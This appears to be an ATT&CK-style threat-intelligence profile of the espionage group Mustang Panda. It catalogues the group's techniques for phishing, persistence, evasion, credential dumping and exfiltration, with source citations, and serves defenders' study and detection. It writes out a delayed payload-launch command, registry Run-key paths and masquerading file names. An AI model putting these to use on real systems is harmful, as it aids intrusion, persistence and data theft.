Mustang Panda, TA416, RedDelta, BRONZE PRESIDENT, STATELY TAURUS, FIREANT, CAMARO DRAGON, EARTH PRETA, HIVE0154, TWILL TYPHOON, TANTALUM, LUMINOUS MOTH, UNC6384, TEMP.Hex, Red Lich, ClumsyToad, Group G0129 (original) (raw)
Enterprise
Account Discovery: Domain Account
Mustang Panda has utilized AdFind to identify domain users.[20]
Enterprise
Acquire Infrastructure: Domains
Mustang Panda has acquired C2 domains prior to operations.[5][21][34][15][25][30][17][10][35]
Mustang Panda registered adversary-controlled domains during RedDelta Modified PlugX Infection Chain Operations that were re-registrations of expired domains.[33]
Acquire Infrastructure: Web Services
Mustang Panda has set up Dropbox and Google Drive to host malicious downloads.[23]
Enterprise
Mustang Panda leveraged a captive portal hijack that redirected the victim to a webpage that prompted the victim to download a malicious payload.[30]
Enterprise
Application Layer Protocol: Web Protocols
Mustang Panda has communicated with its C2 via HTTP POST requests.[3][5][15][17][35]
Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Archive Collected Data: Archive via Utility
Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration.[5][36] Mustang Panda has used WinRAR "Rar.exe" to archive stolen files before exfiltration.[18] Mustang Panda has also used TONESHELL and post-exploitation tools such as RemCom and Impacket to execute WinRAR rar.exe to archive files for exfiltration.[20]
Archive Collected Data: Archive via Custom Method
Mustang Panda has encrypted documents with RC4 prior to exfiltration.[36]
Enterprise
Mustang Panda used custom batch scripts to collect files automatically from a targeted system.[5]
Enterprise
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Mustang Panda has created the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AdobelmdyU to maintain persistence.[14] Mustang Panda has also established persistence via the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run.[7][12]
Mustang Panda used Run registry keys with names such as OneNote Update to execute legitimate executables that would load through search-order hijacking malicious DLLS to ensure persistence during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Command and Scripting Interpreter
Mustang Panda has utilized meterpreter shellcode.[4]
Mustang Panda has used malicious PowerShell scripts to enable execution.[3][9][18]
Mustang Panda used LNK files to execute PowerShell commands leading to eventual PlugX installation during RedDelta Modified PlugX Infection Chain Operations.[33]
Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection.[3][36] Mustang Panda has also utilized cmd.exe to execute commands on an infected host such as cmd.exe /c ping.exe 8.8.8.8 -n 70&&"%temp%\FontEDL.exe".[4]
Mustang Panda has embedded VBScript components in LNK files to download additional files and automate collection.[3][5][9] Mustang Panda has also used VBA macros in maldocs to execute malicious DLLs.[4] Mustang Panda also utilized a VBS Script "autorun.vbs" that created persistence through saving the VBS Script in the startup directory which would cause it to run each time the machine was turned on.[20]
Mustang Panda has executed a JavaScript payload utilizing wscript.exe on the endpoint.[4]
Enterprise
Compromise Accounts: Email Accounts
Mustang Panda has compromised legitimate email accounts to use in their spear-phishing operations.[23]
Enterprise
Data Obfuscation: Protocol or Service Impersonation
Mustang Panda has utilized TLS record headers in network packets to impersonate various versions of TLS protocols to blend in with legitimate network traffic. Mustang Panda has used FakeTLS to communicate with its C2 servers.[13]
Enterprise
Data Staged: Local Data Staging
Mustang Panda has stored collected credential files in c:\windows\temp prior to exfiltration. Mustang Panda has also stored documents for exfiltration in a hidden folder on USB drives.[5][36]
Enterprise
Mustang Panda has embedded debug strings with messages to distract analysts.[23] Mustang Panda has also made calls to Windows API CheckRemoteDebuggerPresent and exits if it detects a debugger.[12]
Enterprise
Mustang Panda has delayed the execution of payloads leveraging ping echo requests cmd /c ping 8.8.8.8 -n 70&&"%temp%\<legitimate executable>".[2][11]
Enterprise
Deobfuscate/Decode Files or Information
Mustang Panda has the ability to decrypt its payload prior to execution.[34][7][10][12] Mustang Panda has also utilized RC4 encryption for malicious payloads.[30][17]
Enterprise
Mustang Panda has developed custom malware for use in their operations.[2][4]
Enterprise
Encrypted Channel: Symmetric Cryptography
Mustang Panda has encrypted C2 communications with RC4.[2][15] Mustang Panda has also leveraged encryption and compression algorithms to obfuscate the traffic between the system and C2 server, methods observed included RC4, AES, XOR with 0x5a, and LZO.[17]
Enterprise
Establish Accounts: Email Accounts
Mustang Panda has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.[16] Mustang Panda has also created fake Google accounts to distribute malware via spear-phishing emails.[23] Mustang Panda has also created accounts for spearphishing operations including the use of services such as Proton Mail.[27][28]
Enterprise
Event Triggered Execution: Windows Management Instrumentation Event Subscription
Mustang Panda's custom ORat tool uses a WMI event consumer to maintain persistence.[5]
Enterprise
Mustang Panda included the use of Cloudflare geofencing mechanisms to limit payload download activity during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
Mustang Panda has used FTP to exfiltrate archive files.[20]
Enterprise
Mustang Panda has exfiltrated stolen data and files to its C2 server.[4][7][11]
Enterprise
Exfiltration Over Physical Medium: Exfiltration over USB
Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.[36]
Enterprise
Exfiltration Over Web Service: Exfiltration to Cloud Storage
Mustang Panda has also exfiltrated archived files to cloud services such as Dropbox using curl.[20][18]
Enterprise
Exploitation for Client Execution
Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code.[9]
Mustang Panda used the GrimResource exploitation technique via specially crafted MSC files for arbitrary code execution during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Mustang Panda has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.[36][20]
Enterprise
Hide Artifacts: Hidden Files and Directories
Mustang Panda's PlugX variant has created a hidden folder on USB drives named RECYCLE.BIN to store malicious executables and collected data.[36] Mustang Panda has also modified file attributes to hidden and system.[2]
Mustang Panda stored encrypted payloads associated with PlugX installation in hidden directories during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file.[2][3][4][19][7][15][20][25][23][14][17][11][37][13] Mustang Panda has abused legitimate executables to side-load malicious DLLs.[21][34][27][28][30]
Mustang Panda used DLL search order hijacking on vulnerable applications to install PlugX payloads during RedDelta Modified PlugX Infection Chain Operations.[33]
Hijack Execution Flow: Executable Installer File Permissions Weakness
Mustang Panda has leveraged legitimate software installer executables such as Setup Factory "IRSetup.exe" to drop and execute their payload.[25]
Enterprise
Mustang Panda has deleted registry keys that store data and maintained persistence.[2]
Mustang Panda will delete their tools and files, and kill processes after their objectives are reached.[5][37]
Mustang Panda has modified file timestamps from the export address table (EAT) in malware to make it difficult to identify creation times.[10]
Enterprise
Mustang Panda has downloaded additional executables following the initial infection stage.[2][4][15][11] Mustang Panda has also leveraged Visual Studio Code code.exe and Dev Tunnels using DevTunnel.exe to propagate additional tools and payloads.[18]
Enterprise
Mustang Panda has used Wevtutil to gather Windows Security Event Logs.[20]
Enterprise
Masquerading: Masquerade Task or Service
Mustang Panda masqueraded Registry run keys as legitimate-looking service names such as OneNote Update during RedDelta Modified PlugX Infection Chain Operations.[33]
Masquerading: Match Legitimate Resource Name or Location
Mustang Panda has used names like adobeupdate.dat and PotPlayerDB.dat to disguise PlugX, and a file named OneDrive.exe to load a Cobalt Strike payload.[15] Mustang Panda has also masqueraded legitimate browser plugin updates to include AdobePlugins.exe.[30]
Masquerading: Double File Extension
Mustang Panda has used an additional filename extension to hide the true file type.[9][3]
Masquerading: Masquerade File Type
Mustang Panda has masqueraded malicious executables as legitimate files that download PlugX malware.[7][11]
Enterprise
Mustang Panda has used various Windows API calls during execution and defense evasion.[2][19][34][27][28][25][23][30][10][12][37][13]
Enterprise
Mustang Panda has leveraged NBTscan to scan IP networks.[20]
Enterprise
Non-Application Layer Protocol
Mustang Panda has utilized TCP-based reverse shells using cmd.exe.[4]
Mustang Panda communicated over TCP 5000 from adversary administrative servers to adversary command and control nodes during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Obfuscated Files or Information
Mustang Panda has delivered initial payloads hidden using archives and encoding measures.[3][4][5][15][9][23][14][16][17] [11][37][13] Mustang Panda has also utilized opaque predicates in payloads to hinder analysis.[2]
Mustang Panda has leveraged obfuscated Windows API function calls that were concealed as unique names, or hashes of the Windows API.[2]
Mustang Panda has utilized LNK files to hide malicious scripts for execution.[4][12] Mustang Panda has also leveraged LNK files that were programmed to display a PDF icon to entice the victim to click on the file to execute an office.exe binary.[21]
Mustang Panda stored installation payloads as encrypted files in hidden folders during RedDelta Modified PlugX Infection Chain Operations.[33]
Mustang Panda has used junk code within their DLL files to hinder analysis.[2][36]
Enterprise
Mustang Panda has obtained and leveraged publicly-available tools for intrusion activities.[4][20]
Obtain Capabilities: Code Signing Certificates
Mustang Panda has used revoked code signing certificates for its malicious payloads.[37]
Obtain Capabilities: Digital Certificates
Mustang Panda has obtained SSL certificates for their C2 domains.[7][30]
Mustang Panda acquired Cloudflare Origin CA TLS certificates during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Mustang Panda utilized "Hdump" to dump credentials from memory.[20]
Mustang Panda has harvested credentials from memory of lssas.exe with Mimikatz.[20]
Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used reg save on the SYSTEM file Registry location to help extract the NTDS.dit file.[5][20]
Mustang Panda has leveraged Mimikatz DCSync feature to obtain user credentials.[20]
Enterprise
Permission Groups Discovery: Domain Groups
Mustang Panda has leveraged AdFind to enumerate domain groups.[20]
Enterprise
Phishing: Spearphishing Attachment
Mustang Panda has used spearphishing attachments to deliver initial access payloads.[4][21][34][27][28][38][15][24][14] Mustang Panda has also delivered archive files such as RAR and ZIP files containing legitimate EXEs and malicious DLLs.[34][27][28]
Mustang Panda leveraged malicious attachments in spearphishing emails for initial access to victim environments in RedDelta Modified PlugX Infection Chain Operations.[33]
Mustang Panda has delivered malicious links to their intended targets.[27][28][35] Mustang Panda has distributed spear-phishing emails with embedded links that direct the victim to a malicious archive hosted on Google or Dropbox.[23]
Mustang Panda distributed malicious links in phishing emails leading to HTML files that would direct the victim to malicious MSC files if running Windows based on User Agent fingerprinting during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Phishing for Information: Spearphishing Link
Mustang Panda has delivered web bugs to profile their intended targets.[16]
Enterprise
Mustang Panda has used tasklist /v to determine active process information.[36] Mustang Panda has also used TONESHELL malware to check the process name and process path to ensure it matches the expected one prior to triggering a custom exception handler.[23]
Enterprise
Mustang Panda has leveraged OpenSSH (sshd.exe) to execute commands, transfer files and spread across the environment communicating over SMB port 445.[18]
Enterprise
Mustang Panda proxied communication through the Cloudflare CDN service during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Remote Access Tools: IDE Tunneling
Mustang Panda has utilized an established Github account to create a tunnel within the victim environment using Visual Studio Code through the code.exe tunnel command.[18]
Remote Access Tools: Remote Desktop Software
Mustang Panda has installed TeamViewer on targeted systems.[5]
Enterprise
Mustang Panda has queried Active Directory for computers using AdFind.[20] Mustang Panda has also utilized SharpNBTScan to scan the victim environment.[18]
Enterprise
Replication Through Removable Media
Mustang Panda has used a customized PlugX variant which could spread through USB connections.[36]
Enterprise
Scheduled Task/Job: Scheduled Task
Mustang Panda has created a scheduled task to execute additional malicious software, as well as maintain persistence.[3][4][5][35] Mustang Panda has also created a scheduled task that creates a reverse shell.[18]
Enterprise
Mustang Panda has used open-source research to identify information about victims to use in targeting to include creating weaponized phishing lures and attachments.[27][28]
Enterprise
Server Software Component: Web Shell
Mustang Panda has used China Chopper web shells to maintain access to victims’ environments.[20]
Enterprise
Mustang Panda has leveraged LoadLibrary to load DLLs.[2]
Enterprise
Mustang Panda has leveraged legitimate software tools such as AntiVirus Agents, Security Services, and App Development tools to execute scripts and to side-load dlls.[20][25]
Enterprise
Mustang Panda has searched the victim system for the InstallUtil.exe program and its version.[3]
Enterprise
Software Extensions: IDE Extensions
Mustang Panda has leveraged Visual Studio Code’s (VSCode) embedded reverse shell feature using the command code.exe tunnel to execute code and deliver additional payloads.[18]
Enterprise
Mustang Panda has used servers under their control to validate tracking pixels sent to phishing victims.[16]
Mustang Panda has hosted malicious payloads on DropBox including PlugX.[16]
Mustang Panda staged malware on adversary-controlled domains and cloud storage instances during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Subvert Trust Controls: Code Signing
Mustang Panda has used valid legitimate digital signatures and certificates to evade detection.[21][34][30][17][10][11][37][13]
Mustang Panda used legitimate, signed binaries such as inkform.exe or ExcelRepairToolboxLauncher.exe for follow-on execution of malicious DLLs through DLL search order hijacking in RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
System Binary Proxy Execution: InstallUtil
Mustang Panda has used InstallUtil.exe to execute a malicious Beacon stager.[3]
System Binary Proxy Execution: Mshta
Mustang Panda has used mshta.exe to launch collection scripts.[5]
System Binary Proxy Execution: Msiexec
Mustang Panda initial payloads downloaded a Windows Installer MSI file that in turn dropped follow-on files leading to installation of PlugX during RedDelta Modified PlugX Infection Chain Operations.[33]
System Binary Proxy Execution: MMC
Mustang Panda used Microsoft Management Console Snap-In Control files, or MSC files, executed via MMC to run follow-on PowerShell commands during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Mustang Panda has gathered system information using systeminfo.[36]
Mustang Panda captured victim operating system type via User Agent analysis during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
System Network Configuration Discovery
Mustang Panda has used ipconfig and arp to determine network configuration information.[36] Mustang Panda has also utilized SharpNBTScan to scan the victim environment.[18]
Enterprise
System Network Connections Discovery
Mustang Panda has used netstat -ano to determine network connection information.[36]
Enterprise
Mustang Panda has utilized a magic value in C2 communications and only executes in memory when response packets match specific values of "17 03 03" or "46 77 4d".[21]
Enterprise
User Execution: Malicious Link
Mustang Panda has sent malicious links including links directing victims to a Google Drive folder.[27][28][9][23][16][35] Mustang Panda has also utilized webpages with Javascript code that downloads malicious payloads to the victim device.[30]
Mustang Panda distributed hyperlinks that would result in an MSC file running a PowerShell command to download and install a remotely-hosted MSI file during RedDelta Modified PlugX Infection Chain Operations.[33]
User Execution: Malicious File
Mustang Panda has sent malicious files requiring direct victim interaction to execute.[3][21][27][28][36][38][15][9][16][37] Mustang Panda has also leveraged executable files that display decoy documents to the victim to provide a resemblance of legitimacy with customized themes related to the victim.[2][4][34][7][24][25][23][17][10][11][12]
Mustang Panda distributed malicious LNK objects for user execution during RedDelta Modified PlugX Infection Chain Operations.[33]
Enterprise
Mustang Panda has used DropBox URLs to deliver variants of PlugX.[16] Mustang Panda has also used Google Drive to host malicious downloads.[27]
Enterprise
Windows Management Instrumentation
Mustang Panda has executed PowerShell scripts via WMI.[3][5]